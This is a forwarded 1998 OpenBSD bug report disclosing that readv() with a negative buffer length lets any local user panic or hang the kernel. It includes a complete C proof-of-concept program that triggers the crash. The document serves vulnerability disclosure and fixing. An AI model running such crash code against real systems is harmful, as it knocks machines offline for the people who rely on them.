Date: Mon, 27 Jul 1998 11:23:59 -0600
From: Michael Fuhr <mfuhr@DIMENSIONAL.COM.>
To: [email protected]Subject: Fwd: Any user can panic OpenBSD machine
-----Forwarded message from [email protected]
Message-Id: <199807271126.MAA16724@chalk.oaktree.net.uk.>
Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
From: [email protected]
To: [email protected]
X-Send-Pr-Version: 3.97
Subject: kernel/549: Any user can panic OpenBSD machine
Sender: [email protected]
>Number: 549
>Category: kernel
>Synopsis: readv with -ve block size panics kernel
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: bugs
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Jul 27 05:40:02 MDT 1998
>Last-Modified:
>Originator: Jon Ribbens
>Organization:
\/ Jon Ribbens / [email protected]
>Release: 2.3
>Environment:
System : OpenBSD 2.3
Architecture: OpenBSD.i386
Machine : i386
>Description:
readv with one of the blocks having a -ve size panics the kernel.
Oops.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
int main(void) {
struct iovec iov[1];
char buffer[1024];
iov[0].iov_base = buffer;
iov[0].iov_len = -1;
return readv(0, iov, 1);
}
run the above program, type a few characters, press return, observe
either kernel panic or machine hang. panic message is
"panic: ureadc: non-positive resid". Any user can do this.
>Fix:
Dunno I'm afraid.
>Audit-Trail:
>Unformatted:
-----End of forwarded message-----
--
Michael Fuhr
http://www.fuhr.net/~mfuhr/
